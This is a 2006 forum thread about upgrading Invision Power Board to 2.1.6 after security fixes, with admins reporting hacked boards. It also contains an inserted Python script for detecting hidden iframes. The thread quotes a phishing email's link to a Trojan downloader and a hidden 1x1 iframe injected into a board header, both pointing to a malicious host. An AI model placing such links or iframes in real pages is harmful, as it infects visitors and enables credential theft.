ellawella Posted May 5, 2006
Everyone should upgrade to 2.1.6, yes. It fixes a few security issues, it's just too important not to. The link is in the announcement thread itself. :)
Thanks Brandon, I missed it the first time. :) Can I just say these new "changed files only" packs are a really welcome addition? Makes upgrading so much easier. Thank you IPS.
BOEING777 Posted May 5, 2006
Stupid newbie question, but do I just upload the new files and overwrite the existing files? And what do I do to ensure that the upgrade is done etc?
bfarber Posted May 5, 2006
Upload the files overwriting the existing ones, and then visit http://yourdomain.com/forums/upgrade/ and follow the onscreen steps.
Is ipb 2.0.4 board vulnerable to these exploits?
There is an upgrade patch for 2.0.x in the announcements forum under the 4/25 security update topic.
BOEING777 Posted May 5, 2006
Thank you :) I assume it's the same procedure for Blog/Gallery too?
Michael P Posted May 5, 2006
The last two emails I've got from IPS have the date inside them as 25 April. When I saw that in the security update - I thought it had been fiddled to look like the email had been sent on the same day as the updates despite it was later ;) Might want to make sure the date is changed in future emails :)
cooldude7273 Posted May 5, 2006
Were there any other changes in 2.1.6 besides these security fixes?
Logan Posted May 5, 2006
Yes, did you not read the announcement?
Invision Power Board 2.1.6 is a maintenance release which consolidates the recent security updates and fixes two potential vulnerabilities where a moderator with topic deletion permission could force an SQL injection. [b]IPB 2.1.6 also features an improved "IPB Update Available" notification system which includes a new image when a security update is released and an internal build number to make it easier to determine which updates need to be made.[/b]
Invisionary Posted May 5, 2006
Yes, did you not read the announcement?
I don't see anything different. Should I? Where is this internal build info displayed? EDIT: Would it be this? v2.1.6 (ID: 21012.60504.u)
gizmo Posted May 5, 2006
So my board gets Hacked: I'm the victim what about what users are saying to me? I submit ticket: I appear to be attacked with some virus exploit. on one of my domains how on earth could this happen? Also I say: Also today users have been sent the below e-mail, this is not from us:
================
Sent: Friday, May 05, 2006 4:24 PM
Subject: From EDITED.co.uk.Try our new service! ( EDITED Main )
> We have made a small tool for our site, I think you will guess what to do
> with it....
> http://traffweb.biz/dl/loadadv771.exe
======================
Had very little support back explaining what the tool is & what would happen if users opened it? Have had loads of abuse from site users (they don't understand exploits). My main concern is can anyone re-assure me as to what this tool will do if users open it? I have had one user saying they have taken all his password & causing mayhem, is this true? Also can anyone tell me what to tell users to restore some very bad damage done in the form of understanding, & re-assurance? I am well gutted.
Logan Posted May 5, 2006
Kaspersky detected that file as: Trojan-Downloader.Win32.Harnig.bg Therefore when the user opens it they will be downloading something else from somewhere else that the hacker intended them to. It could be anything, a virus, a trojan, etc... so yes it is most likely bad.
gizmo Posted May 5, 2006
Can someone advise on the legal side I have had so far of only 1 user saying all sorts against me and that I am to blame because he downloaded & opened file, telling me it's doing all sorts. He's saying because e-mail came from my site. this is latest from user:
AND TO TOP IT ALL NOW I CAN'T GET ONTO MY INTERNET BANKING WHICH HAS ALSO BEEN HACKED INTO. ON MY INTERNET BANKING I HAVE 3 ACCOUNTS AND A CREDIT CARD WHICH HAVE ALL MY DETAILS IN. SOMEONE IS GOING TO PAY FOR THIS AND AT THE MOMENT IT LOOKS LIKE IT WILL BE YOU AS IT CAME FROM YOUR EMAIL ADDRESS.
What I don't understand is so far only one user is making such claims, above quote is just a snippet of what his assumptions are.
Spirix Posted May 5, 2006
I just upgraded my forums. Everything went smooth, and quick. Thanks for IPB 2.1.6, IPS team!
gizmo Posted May 5, 2006
So my board gets Hacked: I'm the victim what about what users are saying to me? I submit ticket: Also I say: Have had loads of abuse from site users (they don't understand exploits). I am well gutted.
I noticed there is talk of what I had Here > http://forums.appletalk.com.au/index.php?showtopic=19226 How long before sites that don't upgrade get this horrible thing?
Im4eversmart Posted May 6, 2006
There appear to be minor blog template changes:
[b]skin_blog_global[/b] > [b]blog_wrapper[/b]
var ipb_var_base_url = "{ipb.script_url}";
Change to
var ipb_var_base_url = "{$this->ipsclass->js_base_url}";
--
skin_blog_list > bloglist_page_end
<if="ipb.member['g_is_supmod'] or ipb.member['_modblog']['moderate_allow_pin']">
Change to
<if="ipb.member['g_is_supmod'] or ipb.member['_blogmod']['moderate_can_pin']">
<if="ipb.member['g_is_supmod'] or ipb.member['_modblog']['moderate_allow_disable']">
Change to
<if="ipb.member['g_is_supmod'] or ipb.member['_blogmod']['moderate_can_disable']">
---
So these are the only template bit changes? Nothing else for all three?
theclub Posted May 6, 2006
After upgrading to 2.1.6 I now have a blank page, no error message, nothing! Every other part of the forum is accessible except the front page, click on my sig to see, then click on the main page link. Anyone have an idea? There's no point me putting a ticket in as it's the weekend, which means here in OZ we don't get seen until almost Tuesday. :(
.Nuke Posted May 6, 2006
Little late here people, I already got hacked. >_<
same here...
murphzlaw1 Posted May 6, 2006
After upgrading to 2.1.6 I now have a blank page, no error message, nothing! Every other part of the forum is accessible except the front page, click on my sig to see, then click on the main page link. Anyone have an idea? There's no point me putting a ticket in as it's the weekend, which means here in OZ we don't get seen until almost Tuesday. :(
Fatal error: Cannot instantiate non-existent class: skin_shoutbox_1 in /home/rikkcow/public_html/forums/sources/ipsclass.php on line 1362
Looks like the shoutbox skin is causing your problem. But since there's an error message now, you may be working on it..:)
tonyrolm Posted May 6, 2006
upload all files then go to http://www.yourdomain.com/forums/upgrade/
I copied the files to the upgrade folder. I ran the above http link and received the following: "Incorrect access You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'." What's the trick? My IPB Version is still at IPB Version v2.1.5 (ID: 21011)
theclub Posted May 6, 2006
Fatal error: Cannot instantiate non-existent class: skin_shoutbox_1 in /home/rikkcow/public_html/forums/sources/ipsclass.php on line 1362 looks like the shoutbox skin is causing your problem. but since there's an error message now, you may be working on it..:)
Yes, I've been working with init.php turned on. cacheid_1 isn't used on my board, it's there because an upgrade didn't work properly without it. Init.php has been returned to '0' now. :(
You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'."
Try running http://www.yourdomain.com/upgrade/index.php Make sure index.php is CHMOD'd :)
Jamer Posted May 6, 2006
Thanks for all 3 upgrades IPS, your hard work is really appreciated. :thumbsup:
Lee69 Posted May 6, 2006
Hi, is there any chance these security fixes could have been the reason I have a random webtraffic tracker at the top of my board index? This is the code it uses:
<iframe src="http://traffweb.biz/dl/adv784.php" width=1 height=1></iframe>
Any ideas what it is? Upgraded to 2.1.6 though, thanks for the update. :)
ellawella Posted May 6, 2006
He's saying because e-mail came from my site. this is latest from user: What I don't understand is so far only one user is making such claims, above quote is just a snipit of what his assumptions are.
To the best of my knowledge he won't be able to sue because it's not your fault. [quote name='Lee
Lee69 Posted May 6, 2006
Looks like you got hacked before you upgraded. Best remove that iframe code. :thumbsup:
Any ideas how? What file is it in? Edit: Nm, fixed it. It was in the board header. :)
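A check for the kind of injection described in the posts above (a 1x1 iframe placed in the board header), as an added example that is not part of the original thread or IPB's own code. The sample template is constructed, apart from the iframe line quoted in the thread; `audit_template`, the `own_hosts` allow-list and the example.com/example.net hosts are assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed board-header template. Line 2 is the iframe quoted in the thread;
# the other lines are made-up sample markup.
SAMPLE_HEADER = '''<div id="logostrip"><a href="index.php">My Board</a></div>
<iframe src="http://traffweb.biz/dl/adv784.php" width=1 height=1></iframe>
<iframe src="http://www.example.com/forums/shoutbox.php" width="600" height="200"></iframe>
<iframe src="//cdn.example.net/x.html" style="display:none"></iframe>
'''

HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value):
    """True when a width/height attribute is 0 to 2 pixels."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 2

class IframeAudit(HTMLParser):
    """Collects iframes that are both invisible and served from a foreign host."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host not in self.own_hosts
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or bool(HIDDEN_CSS.search(a.get("style", ""))))
        if external and hidden:
            line, _ = self.getpos()  # line of the offending tag in the template
            self.findings.append((line, host, a.get("src", "")))

def audit_template(text, own_hosts):
    """Return (line, host, src) for each hidden iframe pointing off-site."""
    parser = IframeAudit(own_hosts)
    parser.feed(text)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for line, host, src in audit_template(SAMPLE_HEADER, {"www.example.com"}):
        print(f"line {line}: hidden iframe to {host} ({src})")
```

Run it over each exported skin template and the board header setting, with the board's own hostnames in `own_hosts`; a finding means the template was modified and should be restored from a known-good copy after upgrading.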
jeb1974 Posted May 6, 2006
I have not seen this question asked. I have a secured community site. Meaning they don't get on unless they know somebody else and they are in the membership list of clubs across the country. Very little chance a member would try to hack the site. I also don't allow people on the site unless they register and have an account and their accounts don't get approved unless we have good reason to trust them. Are people getting hacked because they have public websites? Am I in danger if I keep a trusted membership group and don't let people on that will hack the site? I'm just wondering how much of this requires to have access to the site to hack it.
This topic is now archived and is closed to further replies.